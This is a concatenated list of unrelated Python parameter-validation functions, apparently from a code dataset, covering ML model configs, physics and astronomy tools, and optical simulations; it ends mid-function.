check_ok = True\r\n\r\n _lines = inspect.getsourcelines(method)\r\n _code_text = ''.join(_lines[0]).replace('\\n', '').replace(' ', '').replace('\\\\', '').replace(',]', ']').split('#')[0]\r\n _doc = inspect.getdoc(method)\r\n _doc_text = _doc.replace('\\n', '').replace(' ', '').replace('\\\\', '').replace(',]', ']')\r\n code_text = _code_text.replace(_doc_text, '')\r\n\r\n # Check for correct parameter unpacking when model_parameters are unpacked at once\r\n if 'self.model_parameters.to_numpy()' in code_text:\r\n search_str = str(list(model_parameters.keys())).replace(' ', '').replace(\"'\", \"\").replace('[','').replace(']','')+'=self.model_parameters.to_numpy()'\r\n if not search_str in code_text:\r\n correct_str = search_str.replace(',', ', ').replace('=', ' = ')\r\n warnings.warn(\r\n f'Detected wrong order of parameter unpacking at once. Correct order would be {correct_str}', \r\n UserWarning,\r\n )\r\n check_ok = False\r\n\r\n # Check correct parameter unpacking using the model_parameters dict keys\r\n # First get the lines of the doc string and remove any whitespaces\r\n _doc_lines = _doc.replace(' ', '').split('\\n')\r\n for _line in _lines[0]:\r\n # Make sure that not the lines of the docstring\r\n if _line.replace(' ', '').replace('\\n','') not in _doc_lines:\r\n curr_line = _line.replace(' ', '').replace('\\n','').split('#')[0]\r\n # Check correct variable naming for explicit parameter unpacking\r\n if 'self.model_parameters[' in curr_line:\r\n ok_unpack = False\r\n for p in list(model_parameters.keys()):\r\n valid_par_var1 = f\"{p}=self.model_parameters['{p}']\"\r\n valid_par_var2 = f'{p}=self.model_parameters[\"{p}\"]'\r\n if valid_par_var1 in curr_line or valid_par_var2 in curr_line:\r\n ok_unpack = True\r\n break\r\n if not ok_unpack:\r\n _line_msg = _line.replace('\\n','')\r\n warnings.warn(\r\n f'Variable names from explicit parameter unpacking should match those of the corresponding keys.\\nThis line seems bad: {_line_msg}.\\nValid model parameters are {list(model_parameters.keys())}',\r\n UserWarning,\r\n )\r\n check_ok = False\r\n\r\n return check_ok", "def check_param(self):\n check_tuple = (\"float16\", \"float32\", \"int32\")\n check_shape(self.shape_x, param_name=\"x\")\n check_shape(self.shape_indices, param_name=\"indices\")\n check_shape(self.shape_v, param_name=\"v\")\n check_dtype(self.dtype_x, check_tuple, param_name=\"x\")\n check_dtype(self.dtype_indices, (\"int32\",), param_name=\"indices\")\n check_dtype(self.dtype_v, check_tuple, param_name=\"v\")\n if len(self.shape_x) != len(self.shape_v):\n raise RuntimeError(\"The number of dimension x must\"\n \" be same as dimension v\")\n\n if self.shape_v[0] != self.shape_indices[0]:\n raise RuntimeError(\"The length of rank 0 of tensor v must\"\n \" be the same as length of indices\")\n\n if len(self.shape_indices) != 1:\n raise RuntimeError(\"The length of indices only support 1\")\n for i in range(1, len(self.shape_v)):\n if self.shape_x[i] != self.shape_v[i]:\n if not self.check_special():\n raise RuntimeError(\"The length of each rank of tensor x\"\n \" must be the same as length of\"\n \" each or next rank of tensor v\")", "def _check_required_params(self):\n logging.debug('.. check if Experiment have all required parameters')\n for n in self.REQUIRED_PARAMS:\n if n not in self.params:\n raise ValueError('missing \"%s\" among %r' % (n, self.params.keys()))", "def check_params_equal(param1, param2):\n for key, val in param1.items():\n if np.any(param1[key] != param2[key]):\n return False\n return True", "def check_optimization_sanity(self):\n if len(self.parameters) == 0:\n msg = \"No parameters defined. Optimization not possible.\"\n raise ValueError(msg)\n\n if len(self.constraints) == 0:\n msg = \"No constraints defined. Optimization not possible.\"\n raise ValueError(msg)", "def test_joint_parameter(self):\n assert_allclose(self.jf.fitparams[0], self.g1.parameters[0])\n assert_allclose(self.jf.fitparams[0], self.g2.parameters[0])", "def validate_parameters(self):\n\n flag = True\n warnings = \"\"\n # Check radius\n r = self.parameters.get('rw', 0)\n if type(r) not in [int, float]:\n flag = False\n warnings += \"Well radius rw must be a float value\\n\"\n else:\n if r <= 0:\n flag = False\n warnings += \"Well radius rw must be higher than 0\\n\"\n # Check if is full penetrating\n op = self.parameters.get('full', False)\n\n if not op:\n # Check observation well length\n if 'd' in self.parameters and 'l' in self.parameters:\n d = self.parameters.get('d', -1)\n l = self.parameters.get('l', -1)\n if type(l) not in [int, float]:\n flag = False\n warnings += \"Depth of well bottom must be a float value\\n\"\n else:\n if l < 0:\n flag = False\n warnings += \"Depth l must be higher than 0\\n\"\n if type(d) not in [int, float]:\n flag = False\n warnings += \"Depth of well screen must be a float value\\n\"\n else:\n if d < 0 or d > l:\n flag = False\n warnings += \"Depth d must be in range 0 <= d <= l\\n\"\n return(flag, warnings) # End Function", "def manual_input_check(manual_params, machine, paths):\n print(\"checking manual input\")\n m = manual_params # so we don't have to type out manual_params everywhere\n\n int_dir = paths[0]\n ncsd_path = paths[1]\n working_dir = paths[2]\n # do we have a 3-body interaction?\n three_body = (abs(m.interaction_type) == 3)\n\n # first check if paths exist\n if not exists(int_dir):\n raise IOError(\n \"Interactions directory \" + int_dir + \" does not exist\")\n if not exists(working_dir):\n raise IOError(\n \"Working directory \" + working_dir + \" does not exist\")\n f2 = join(int_dir, m.two_body_interaction)\n if not exists(f2):\n raise IOError(\"Two body file \"+f2+\" does not exist\")\n if three_body:\n f3 = join(int_dir, m.three_body_interaction)\n if not exists(f3):\n raise IOError(\"Three body file \"+f3+\" does not exist\")\n if not exists(ncsd_path):\n raise IOError(\"NCSD file \"+ncsd_path+\" does not exist!\")\n\n # check that parameters make sense\n if not (m.N_12max >= m.N_1max):\n raise ValueError(\"N_12max must be >= N_1max\")\n if three_body:\n if not (m.N_123max >= m.N_12max):\n raise ValueError(\"N_123max must be >= N_12max\")\n\n # check that parameters match with filenames\n try:\n # TBME file\n tbme_filename = m.two_body_interaction\n last_chunk = tbme_filename.split(\".\")[-1]\n [hbar_omega_verif_0, other_stuff] = last_chunk.split(\"_\")\n hbar_omega_verif_0 = float(hbar_omega_verif_0)\n # see if str(N_1max) + str(N_1max) == other_stuff\n if other_stuff != str(m.N_1max) + str(m.N_12max):\n print(\"\\nYour TMBE file doesn't seem to match your parameters!\")\n print(\"N_1max = \"+str(m.N_1max))\n print(\"N_12max = \"+str(m.N_12max))\n print(\"TBME filename = \"+tbme_filename)\n print(\"relevant section = \"+other_stuff)\n yn = \"\"\n while yn not in [\"y\", \"n\"]:\n yn = input(\"Do you want to continue? (y/n): \")\n if yn == \"y\":\n pass\n else:\n sys.exit(0)\n # see if hbar_omega matches\n if hbar_omega_verif_0 != m.hbar_omega:\n print(\"\\nYour TMBE file doesn't seem to match your parameters!\")\n print(\"hbar_omega = \"+str(m.hbar_omega))\n print(\"TBME filename = \"+tbme_filename)\n print(\"hbar_omega from the file is\", hbar_omega_verif_0)\n yn = \"\"\n while yn not in [\"y\", \"n\"]:\n yn = input(\"Do you want to continue? (y/n): \")\n if yn == \"y\":\n pass\n else:\n sys.exit(0)\n except Exception as e:\n print(\"Minor error caught while parsing TMBE filename.\")\n print(\"Printing traceback as if it had caused a crash:\")\n traceback.print_exc()\n print(\"TBME filename that caused this error:\", tbme_filename)\n print(\"We assume everything's fine, but double-check!\\n\")\n\n if three_body:\n try:\n # three-body file\n three_filename = m.three_body_interaction\n [penultimate_chunk, last_chunk] = three_filename.split(\".\")[-2:]\n # get hbar_omega\n [hbar_omega_verif_1, other_stuff] = last_chunk.split(\"_\")\n hbar_omega_verif_1 = float(hbar_omega_verif_1)\n # get N_#max variables\n n_maxes = penultimate_chunk.split(\"_\")[-1]\n # see if str(N_1max) + str(N_1max) == other_stuff\n if n_maxes != str(m.N_123max) + str(m.N_12max) + str(m.N_1max):\n print(\n \"\\nYour 3-body file doesn't seem \"\n \"to match your parameters!\")\n print(\"N_1max = \"+str(m.N_1max))\n print(\"N_12max = \"+str(m.N_12max))\n print(\"N_123max = \"+str(m.N_123max))\n print(\"3-body filename = \"+three_filename)\n print(\"relevant section = \"+n_maxes)\n yn = \"\"\n while yn not in [\"y\", \"n\"]:\n yn = input(\"Do you want to continue? (y/n): \")\n if yn == \"y\":\n pass\n else:\n sys.exit(0)\n # see if hbar_omega matches\n if hbar_omega_verif_1 != m.hbar_omega:\n print(\n \"\\nYour 3-body file doesn't seem \"\n \"to match your parameters!\")\n print(\"hbar_omega = \"+str(m.hbar_omega))\n print(\"3-body filename = \"+three_filename)\n print(\"hbar_omega from the file is\", hbar_omega_verif_1)\n yn = \"\"\n while yn not in [\"y\", \"n\"]:\n yn = input(\"Do you want to continue? (y/n): \")\n if yn == \"y\":\n pass\n else:\n sys.exit(0)\n except Exception as e:\n print(\"Minor error caught while parsing 3-body filename.\")\n print(\"Printing traceback as if it had caused a crash:\")\n traceback.print_exc()\n print(\"3-body filename that caused the error:\", three_filename)\n print(\"We assume everything's fine, but double-check!\\n\")\n\n # check there's at least kappa_points kappa values\n kappa_vals = list(map(float, m.kappa_vals.split()))\n if len(kappa_vals) < m.kappa_points:\n raise ValueError(\n \"You must have at least kappa_points kappa values!\"\n \" kappa_points = \"+str(m.kappa_points))\n\n # and if kappa_points and kappa_vals disagree, make sure they know that\n if len(kappa_vals) > m.kappa_points:\n print(\n \"Did you mean to enter \"+str(len(kappa_vals)) +\n \" values for kappa_min, but set kappa_points to \" +\n str(m.kappa_points)+\"?\")\n user_input = \"\"\n while user_input not in [\"Y\", \"N\"]:\n user_input = input(\"Enter Y to proceed, N to cancel: \")\n if user_input == \"N\":\n print(\"Okay, exiting... Try again!\")\n sys.exit(0)\n\n kr_values = [-1, 1, 2, 3, 4]\n if m.kappa_restart not in kr_values:\n raise ValueError(\n \"kappa_restart must be one of\" + \" \".join(map(str, kr_values)))\n\n if m.saved_pivot not in [\"F\", \"T\"]:\n raise ValueError(\"saved_pivot must be either T or F\")\n\n if (m.irest == 1 or m.kappa_restart != -1 or m.nhw_restart != -1) \\\n and m.saved_pivot == \"F\":\n raise ValueError(\"why not use the saved pivot if you're restarting?\")\n\n # if this function runs, the input passes the test", "def _check_model_params(self):\n enc_type = self.configs['encoder_type']\n if enc_type not in ['uni', 'bi', 'gnmt']:\n raise ValueError(\"encoder type must be one of ['uni', 'bi', 'gnmt'].\")\n\n attn = self.configs['attention']\n if attn not in ['', 'luong', 'scaled_luong', 'bahdanau', 'normed_bahdanau']:\n raise ValueError(\n \"attention must be one of \"\n \"['', 'luong', 'scaled_luong', 'bahdanau', 'normed_bahdanau'].\")\n\n num_enc_layers = self.configs['num_encoder_layers']\n num_dec_layers = self.configs['num_decoder_layers']\n if not num_enc_layers or not num_dec_layers:\n raise ValueError(\n \"num_encoder_layers and num_decoder_layers must be greater than 0.\")\n if num_enc_layers != num_dec_layers:\n self.configs['pass_hidden_state'] = False\n\n if enc_type == \"bi\" and num_enc_layers % 2 != 0:\n raise ValueError(\n \"num_encoder_layers must be even when encoder_type is %s.\" % enc_type)\n\n attn_arch = self.configs.get('attention_architecture', None)\n if attn_arch in [\"gnmt\"] and num_enc_layers < 2:\n raise ValueError(\"For gnmt attention architecture, \"\n \"num_encoder_layers: %d should be >= 2.\" %\n num_enc_layers)\n\n infer_mode = self.configs['infer_mode']\n beam_width = self.configs.get(\"beam_width\", 0)\n if infer_mode == \"beam_search\" and beam_width <= 0:\n raise ValueError(\"beam_width must be > 0 if infer_mode is `beam_search`.\")\n\n sample_temp = self.configs.get(\"sampling_temperature\", 0.0)\n if infer_mode == \"sample\" and sample_temp <= 0.0:\n raise ValueError(\n \"sampling_temperature must greater than 0.0 using sample decode.\")\n\n subword_option = self.configs['subword_option']\n if subword_option not in ['', 'bpe', 'spm']:\n raise ValueError(\"subword_option must be one of ['','bpe','spm']\")\n\n num_enc_residual_layers = 0\n num_dec_residual_layers = 0\n if self.configs['residual']:\n if num_enc_layers > 1:\n num_enc_residual_layers = num_enc_layers - 1\n if num_dec_layers > 1:\n num_dec_residual_layers = num_dec_layers - 1\n\n if enc_type == \"gnmt\":\n num_enc_residual_layers = num_enc_layers - 2\n if num_enc_layers == num_dec_layers:\n num_dec_residual_layers = num_enc_residual_layers\n\n self.configs['num_encoder_residual_layers'] = num_enc_residual_layers\n self.configs['num_decoder_residual_layers'] = num_dec_residual_layers", "def validate_parameters(side_1, side_2, side_3):\n if side_1 > 0 and side_2 > 0 and side_3 > 0 and (side_1 + side_2 > side_3) and \\\n (side_1 + side_3 > side_2) and (side_3 + side_2 > side_1):\n return True\n else:\n return False", "def checkParameters(self):\n EDVerbose.DEBUG(\"EDPluginExecVideov10.checkParameters\")\n self.checkMandatoryParameters(self.getDataInput(), \"Data Input is None\")\n self.checkMandatoryParameters(self.getDataInput().getInputImagePath(), \"inputImage list is None\")\n for oneXSDataFile in self.getDataInput().getInputImagePath():\n self.checkMandatoryParameters(oneXSDataFile.getPath().getValue(), \"input Image does not exist\" + oneXSDataFile.marshal())", "def _assert_correct_params(external_obj, param_attr, params):\n if type(params) == dict:\n for param in params.keys():\n npt.assert_allclose(\n getattr(external_obj, param_attr)['A'][param], params[param])\n if type(params) == tuple:\n npt.assert_allclose(getattr(external_obj, param_attr)['A'], params)", "def _check_is_fitted(self):\n check_is_fitted(self, ['w', 'b'])", "def _assert_validity_of_inputs(self):\n for item in [\"frequency\", \"Dt\", \"gain\", \"gain_imu\", \"gain_marg\"]:\n if isinstance(self.__getattribute__(item), bool):\n raise TypeError(f\"Parameter '{item}' must be numeric.\")\n if not isinstance(self.__getattribute__(item), (int, float)):\n raise TypeError(f\"Parameter '{item}' is not a non-zero number.\")\n if self.__getattribute__(item) <= 0.0:\n raise ValueError(f\"Parameter '{item}' must be a non-zero number.\")\n if self.q0 is not None:\n if not isinstance(self.q0, (list, tuple, np.ndarray)):\n raise TypeError(f\"Parameter 'q0' must be an array. Got {type(self.q0)}.\")\n self.q0 = np.copy(self.q0)\n if self.q0.shape != (4,):\n raise ValueError(f\"Parameter 'q0' must be an array of shape (4,). It is {self.q0.shape}.\")\n if not np.allclose(np.linalg.norm(self.q0), 1.0):\n raise ValueError(f\"Parameter 'q0' must be a versor (norm equal to 1.0). Its norm is equal to {np.linalg.norm(self.q0)}.\")", "def check_mode(params, thorough=False, tol=1e-5):\r\n N = len(params['d_list'])\r\n w = params['w']\r\n kx = params['kx']\r\n kz_list = params['kz_list']\r\n ex_list = params['ex_list']\r\n ez_list = params['ez_list']\r\n mu_list = params['mu_list']\r\n layer_bottom_list = params['layer_bottom_list']\r\n Sx_list = params['Sx_list']\r\n Sx_total = params['Sx_total']\r\n \r\n # check boundary conditions for Ex, Ez, Hy\r\n for layer_under in range(0,N-1):\r\n layer_over = layer_under + 1\r\n z = layer_bottom_list[layer_over]\r\n ez_under = ez_list[layer_under]\r\n ez_over = ez_list[layer_over]\r\n \r\n a = Ex(z, params, layer=layer_under)\r\n b = Ex(z, params, layer=layer_over)\r\n if not floats_are_equal(a,b,tol):\r\n return 'Ex b.c. error @ layer ' + str(layer_under) + ' - ' + str((a,b))\r\n a = ez_under * Ez(z, params, layer=layer_under)\r\n b = ez_over * Ez(z, params, layer=layer_over)\r\n if not floats_are_equal(a,b,tol):\r\n return 'Ez b.c. error @ layer ' + str(layer_under) + ' - ' + str((a,b))\r\n a = Hy(z, params, layer=layer_under)\r\n b = Hy(z, params, layer=layer_over)\r\n if not floats_are_equal(a,b,tol):\r\n return 'Hy b.c. error @ layer ' + str(layer_under) + ' - ' + str((a,b))\r\n \r\n # check a few properties of each layer\r\n for i in range(N):\r\n kz = kz_list[i]\r\n ez = ez_list[i]\r\n ex = ex_list[i]\r\n mu = mu_list[i]\r\n assert_floats_are_equal(kz**2,\r\n w**2 * mu * ex / nu.c0**2 - kx**2 * ex /ez,\r\n tol=1e-8)\r\n assert kz.imag >= 0\r\n \r\n if (i == 0 or i == N-1) and kz.imag == 0:\r\n return 'kz indicates non-confined wave @ layer ' + str(i)\r\n \r\n if thorough:\r\n # Check Sx_list against a numerical integration. This really just tests\r\n # whether I made a stupid mistake in calculus or algebra, it should\r\n # always pass even for non-modes.\r\n \r\n # Numerical integration expects order-unity integrand, or else the\r\n # absolute-error criterion can fire before convergence. (A few orders\r\n # of magnitude away from 1 is OK, but not 20 orders of magnitude.) So\r\n # I'll scale up before integrating, then scale down by the same factor\r\n # afterwards. Poor integration can flag a correct solution as incorrect,\r\n # but not vice-versa: If it passes the test, you can trust it.\r\n \r\n # This scale_factor seems to work pretty reliably\r\n scale_factor = max(abs(Sx(0, params, layer=0)),\r\n abs(Sx(0, params, layer=1)))\r\n assert scale_factor != 0\r\n for i in range(N):\r\n # Calculate integration limits\r\n if i != 0:\r\n lower_z = layer_bottom_list[i]\r\n else:\r\n lower_z = -20 / abs(kz_list[i].imag)\r\n if i != N-1:\r\n upper_z = layer_bottom_list[i+1]\r\n else:\r\n upper_z = 20 / abs(kz_list[i].imag)\r\n \r\n integrand_re = lambda z : (Sx(z, params, layer=i) / scale_factor).real\r\n integrand_im = lambda z : (Sx(z, params, layer=i) / scale_factor).imag\r\n Sx_integrated = (scipy.integrate.quad(integrand_re, lower_z, upper_z)[0]\r\n + 1j * scipy.integrate.quad(integrand_im, lower_z, upper_z)[0])\r\n Sx_integrated *= scale_factor\r\n assert_floats_are_equal(Sx_list[i], Sx_integrated, tol=1e-5)\r\n assert_floats_are_equal(Sx_total, sum(Sx_list), tol=1e-8)\r\n \r\n # All tests passed!\r\n return True", "def _check_params(self):\n if self.k_initial <= 0 :\n raise ValueError('Initial K should be 1 or more.')", "def test_verify(perfectModelEnsemble_initialized_control):\n assert perfectModelEnsemble_initialized_control.verify(\n metric=\"mse\", comparison=\"m2e\", dim=[\"init\", \"member\"]\n )", "def check_model_sanity(models):\n if not isinstance(models, (list, tuple)):\n models = [models]\n\n for _model in models:\n if not hasattr(_model, \"predict\"):\n raise AttributeError(\"Model require `predict` method.\")\n\n if not hasattr(_model, \"predict_prob\"):\n raise AttributeError(\"Model require `predict_proba` method.\")\n\n return True", "def validate_params(self) -> None:\n if isinstance(self.hamiltonian, PauliSumOp) and isinstance(\n self.hamiltonian.coeff, ParameterExpression\n ):\n raise ValueError(\"A global parametrized coefficient for PauliSumOp is not allowed.\")", "def checkParameters(self):\n self.DEBUG(\"EDPluginExecDatcmpv2_0.checkParameters\")\n self.checkMandatoryParameters(self.getDataInput(), \"Data Input is None\")\n self.checkMandatoryParameters(self.getDataInput().inputCurve, \"No input 1D curves file provided\")", "def validateInputParams(self): \n # Return dictionary\n retval = {}\n retval['status'] = True\n retval['axis'] = ''\n \n # Get the separationaxis of input MMS. \n sepaxis = ph.axisType(self.__args['vis'])\n if sepaxis.isspace() or sepaxis.__len__() == 0:\n sepaxis = 'unknown'\n elif sepaxis == 'scan,spw':\n sepaxis = 'auto'\n \n #Get list of subMSs in MMS\n subMSList = ParallelTaskHelper.getReferencedMSs(self.__args['vis'])\n \n if self.__taskname == \"mstransform\":\n \n if (self.__args['combinespws'] == True or self.__args['nspw'] > 1) and \\\n (self.__args['timeaverage'] == False):\n spwsel = self.__getSpwIds(self.__args['vis'], self.__args['spw']) \n # Get dictionary with spwids of all subMS in the MMS\n spwdict = ph.getScanSpwSummary(subMSList) \n # For each subMS, check if it has the spw selection\n for subms in subMSList:\n subms_spwids = ph.getSubMSSpwIds(subms, spwdict)\n slist = map(str,subms_spwids)\n # Check if the subms contains all the selected spws\n if not self.__isSpwContained(spwsel, slist):\n casalog.post('Cannot combine or separate spws in parallel because the subMSs do not contain all the selected spws',\\\n 'WARN')\n # Set the new separation axis for the output\n retval['status'] = False\n retval['axis'] = 'scan'\n break\n \n elif (self.__args['timeaverage'] == True and self.__args['timespan'] == 'scan') and \\\n (self.__args['combinespws'] == False and self.__args['nspw'] == 1):\n # Get the value of timebin as a float\n timebin = self.__args['timebin']\n tsec = qa.quantity(timebin,'s')['value']\n scansel = self.__getScanIds(self.__args['vis'], self.__args['scan'])\n # For each subms, check if scans length is <= timebin\n for subms in subMSList:\n if not self.__isScanContained(subms, scansel, tsec):\n casalog.post('Cannot process MMS in parallel when timespan=\\'scan\\' because the subMSs do not contain all the selected scans',\\\n 'WARN')\n # Set the new separation axis for the output\n retval['status'] = False\n retval['axis'] = 'spw'\n break\n \n # Two transformations are requested.\n elif (self.__args['combinespws'] == True or self.__args['nspw'] > 1) and \\\n (self.__args['timeaverage'] == True and self.__args['timespan'] == 'scan'):\n # Check spws and scans in subMSs\n spwsel = self.__getSpwIds(self.__args['vis'], self.__args['spw'])\n spwdict = ph.getScanSpwSummary(subMSList) \n scansel = self.__getScanIds(self.__args['vis'], self.__args['scan'])\n timebin = self.__args['timebin']\n tsec = qa.quantity(timebin,'s')['value']\n for subms in subMSList:\n subms_spwids = ph.getSubMSSpwIds(subms, spwdict)\n slist = map(str,subms_spwids)\n if self.__isSpwContained(spwsel, slist):\n if not self.__isScanContained(subms, scansel, tsec):\n casalog.post('The subMSs of input MMS do not contain the necessary scans','WARN')\n retval['status'] = False\n retval['axis'] = ''\n break \n else:\n casalog.post('The subMSs of input MMS do not contain the necessary spws','WARN')\n retval['status'] = False\n retval['axis'] = ''\n break\n \n \n elif self.__taskname == \"split2\" or self.__taskname == \"split\": \n if (sepaxis != 'spw' and self.__args['combine'] == 'scan'):\n scansel = self.__getScanIds(self.__args['vis'], self.__args['scan'])\n timebin = self.__args['timebin']\n tsec = qa.quantity(timebin,'s')['value']\n for subms in subMSList:\n if not self.__isScanContained(subms, scansel, tsec):\n casalog.post('Cannot process MMS in parallel when combine=\\'scan\\' because the subMSs do not contain all the selected scans',\\\n 'WARN')\n casalog.post(\"Please set keepmms to False or use task mstransform in this case.\",'ERROR')\n retval['status'] = False\n retval['axis'] = ''\n break\n\n elif self.__taskname == \"cvel2\" and sepaxis != 'scan':\n spwsel = self.__getSpwIds(self.__args['vis'], self.__args['spw']) \n spwdict = ph.getScanSpwSummary(subMSList) \n for subms in subMSList:\n subms_spwids = ph.getSubMSSpwIds(subms, spwdict)\n slist = map(str,subms_spwids)\n # Check if the subms contains all the selected spws\n if not self.__isSpwContained(spwsel, slist):\n casalog.post('Cannot combine spws in parallel because the subMSs do not contain all the selected spws',\\\n 'WARN')\n casalog.post(\"Please set keepmms to False or use task mstransform in this case.\",'ERROR')\n # Set the new separation axis for the output\n retval['status'] = False\n retval['axis'] = ''\n break\n \n\n return retval", "def _is_parameters_ok(self):\n\n if self.configuration['mpd_url'] is None:\n raise InvalidParameterException(\"MPD needs a url\")\n\n if self.configuration['mpd_action'] is None:\n raise InvalidParameterException(\"MPD needs an action\")\n elif self.configuration['mpd_action'] in ['playlist', 'playlist_spotify', 'search', 'file'] \\\n and self.configuration['query'] is None:\n raise InvalidParameterException(\"MPD requires a query for this action\")\n\n return True", "def checkNeededParams(self):\n for clp,value in self.neededParamsNames.items():\n if value[0] not in self.neededParams:\n print >> sys.stderr, clp+\" is a mandatory parameter \"\n self.printUsage()\n sys.exit(1)", "def check_constraints(Px,pk1,pk2,mu1,mu2,mu3):\n # Constraint 1: Check polarisation basis probabilities are valid.\n if (Px >= 1.0 or Px <= 0.0):\n print(\"Error! Constraint 1 < Px < 0: \", Px)\n exit(1)\n # Constraint 2: Check probability of pulse with intensity 1 is in bounds.\n if (pk1 >= 1.0 or pk1 <= 0.0):\n print(\"Error! Constraint 1 < pk1 < 0: \", pk1)\n exit(1)\n # Constraint 3: Check probability of pulse with intensity 2 is in bounds.\n if (pk2 >= 1.0 or pk2 <= 0.0):\n print(\"Error! Constraint 1 < pk2 < 0: \", pk2)\n exit(1)\n # Constraint 4: Check sum of probabilities for intensity 1 & 2 are less\n # than unity.\n if ((pk1 + pk2) >= 1.0):\n print(\"Error! Constraint (pk1 + pk2) < 1: \", pk1 + pk2)\n exit(1)\n # Constraint 5: Check value of intensity 1 is in bounds.\n if (mu1 >= 1.0 or mu1 <= 0.0):\n print(\"Error! Constraint 1 < mu1 < 0: \", mu1)\n exit(1)\n # Constraint 6: Check value of intensity 2 is in bounds.\n if (mu2 >= 1.0 or mu2 <= 0.0):\n print(\"Error! Constraint 1 < mu2 < 0: \", mu2)\n exit(1)\n # Constraint 7: Check values of all intensities are in bounds.\n if ((mu1 - mu3) <= mu2):\n print(\"Error! Constraint (mu1-mu3) > mu2: \", (mu1-mu3), mu2)\n exit(1)\n # Constraint 8: Check values of intensities 2 & 3 are in bounds.\n if (mu2 <= mu3):\n print(\"Error! Constraint mu2 > mu3: \", mu2, mu3)\n exit(1)\n return None", "def _mixed_precision_enabled_for_params(self) -> bool:\n return self.mixed_precision.param_dtype is not None", "def is_mvmm(estimator):\n if isinstance(estimator, MultiViewMixtureModelMixin) or \\\n isinstance(estimator, MVMMGridSearch) or \\\n isinstance(estimator, TwoStage) or \\\n isinstance(estimator, SpectralPenSearchByBlockMVMM):\n # isinstance(estimator, SpectralPenSearchMVMM) or \\\n\n return True\n else:\n return False", "def test_find_best_model(self):\n parameters = dict(\n model=('spherical', 'gaussian', 'exponential', 'matern')\n )\n gs = GridSearchCV(\n VariogramEstimator(n_lags=15, normalize=False),\n parameters,\n cv=3\n )\n\n gs = gs.fit(self.c, self.v)\n\n # Python 3.6 yields 'exponential', \n # while 3.7, 3.8 yield 'gaussian' - this is so stupid\n self.assertTrue(gs.best_params_['model'] in ['gaussian', 'exponential'])", "def set_parameters_selected(self, p):\n if len(p) == len(self.parameters):\n # The vector have compatible dimensions\n i = 0\n for par in self.parameters:\n self.fmu.set_real(par.value_reference, p[i])\n i += 1\n return True\n else:\n # the vectors are not compatibles\n logger.error(\"The vector containing the parameters to set is not compatible with the number of parameters selected\")\n logger.error(\"{0} vs {1}\".format(len(p), len(self.parameters)))\n return False", "def check_params(params):\n\n required = ['initlandmarks']\n for r in required:\n assert r in params.keys(), 'Params must include {}'.format(r)", "def _update_model_params(self, params, model_ID, model, param_grid):\n \n params = params.copy()\n param_grid = param_grid.copy()\n \n params_transform = {}\n \n for key in params.keys():\n \n if 'log10.' in key:\n log10_transform = True\n else:\n log10_transform = False\n \n key = key.replace('log10.','')\n \n type_str = str(type(param_grid[key][0]))\n \n if 'int' in type_str: \n if log10_transform:\n params_transform[key] = int(10**params['log10.'+key])\n else:\n params_transform[key] = int(params[key])\n \n elif 'float' in type_str:\n if log10_transform:\n params_transform[key] = float(10**params['log10.'+key])\n \n else:\n params_transform[key] = float(params[key])\n \n elif 'str' in type_str: #index the param grid for hyperparams using 'choice'\n params_transform[key] = param_grid[key][params[key]]\n \n if 'densenet' not in model_ID.lower(): \n model.__dict__[key] = params_transform[key]\n \n assert(type_str == str(type(params_transform[key]))), 'type(param_grid[key][0]) changed from '+type_str+' to '+str(type(param_grid[key][0]))+' after updating params for key:'+str(key)\n \n if 'str' in type_str:\n assert(params_transform[key] in param_grid[key]), 'params_transform['+key+']='+str(params_transform[key])+' is not in the list of valid parameter choices:'+str(param_grid[key])\n \n else:\n assert(params_transform[key]<=max(param_grid[key]) and params_transform[key]>=min(param_grid[key])), 'params_transform['+key+']='+str(params_transform[key])+' does not lie in the range of valid values:'+str([min(param_grid[key]),max(param_grid[key])] )\n \n if 'densenet' in model_ID.lower(): \n model = model(**params_transform)\n \n return params_transform, model", "def test_parameters(self):\n assert self.hll.p == 8\n assert self.hll.m == 256\n assert round(self.hll.alpha - 0.7182725932495458, 5) == 0\n assert round(self.hll.error - 0.065, 5) == 0\n assert self.hll64.treshold == 120000", "def checkParameters(self):\n self.DEBUG(\"EDPluginControlStitchImagev1_0.checkParameters\")\n self.checkMandatoryParameters(self.getDataInput(), \"Data Input is None\")\n self.checkMandatoryParameters(self.getDataInput().getInputImages(), \"No input Images\")", "def parameter_check(coordinates, \n neighbors, \n bandwidth, \n convergence, \n percentage):\n # Create a boolean vector to keep track of incorrect inputs\n incorrect_inputs = np.zeros(5, dtype = bool)\n # Check whether two-dimensional coordinates are provided\n if not type(coordinates) == np.ndarray:\n incorrect_inputs[0] = True\n elif not coordinates.shape[1] == 2:\n incorrect_inputs[0] = True\n # Check whether neighbors is a positive integer or float\n if not ((type(neighbors) == int and neighbors > 0)\n and not ((type(neighbors) == float) \n and (neighbors > 0)\n and (neighbors.is_integer() == True))):\n incorrect_inputs[1] = True\n # Check whether bandwidth is a positive integer or float\n if not bandwidth == None:\n if not ((type(bandwidth) == int and bandwidth > 0)\n or (type(bandwidth) == float) and bandwidth > 0):\n incorrect_inputs[2] = True\n # Check whether convergence is a positive integer or float\n if not convergence == None:\n if not ((type(convergence) == int and convergence > 0)\n or (type(convergence) == float) and convergence > 0):\n incorrect_inputs[3] = True\n # Check whether percentage is a valid percentage value\n if not percentage == None:\n if not ((type(percentage) == int and percentage >= 0 \n and percentage <= 100)\n or ((type(percentage) == float) and percentage >= 0 \n and percentage <= 100)):\n incorrect_inputs[4] = True\n # Define error messages for each parameter failing the tests\n errors = ['ERROR: coordinates: Must be a 2-column numpy.ndarray',\n 'ERROR: neighbors: Must be a whole-number int or float > 0',\n 'ERROR: bandwidth: Must be an int or float > 0, or None',\n 'ERROR: convergence: Must be an int or float > 0, or None',\n 'ERROR: percentage: Must be an int or float in [0, 100], or None']\n # Print eventual error messages and terminate the code\n if any(value == True for value in incorrect_inputs):\n for i in range(0, len(errors)):\n if incorrect_inputs[i] == True:\n print(errors[i])\n sys.exit()", "def _check_param(in_params, req_param, opt_param=list()):\n for param in req_param:\n if param not in in_params:\n raise ValueError('{} parameter is required'.format(param))\n defined_param = set(req_param + opt_param)\n for param in in_params:\n if param not in defined_param:\n print(\n \"WARNING: received unexpected parameter {}\".format(param))", "def validate_system(self):\n if bool(self.optical_system):\n for material in self.optical_system.materials:\n sig = set(material.keys())\n required = self.material_signature\n if not (sig >= required):\n raise RuntimeError(\n f\"Optical engine failed materials signature check. \"\n f\"System signature is {sig} but needed {required}\"\n )\n \n if self.dimension == 2:\n if bool(self.optical_system._amalgamated_sources):\n sig = set(self.optical_system._amalgamated_sources.keys())\n required = SEGMENT_GEO_SIG | self.input_signature\n if not (sig >= required):\n raise RuntimeError(\n f\"Optical engine 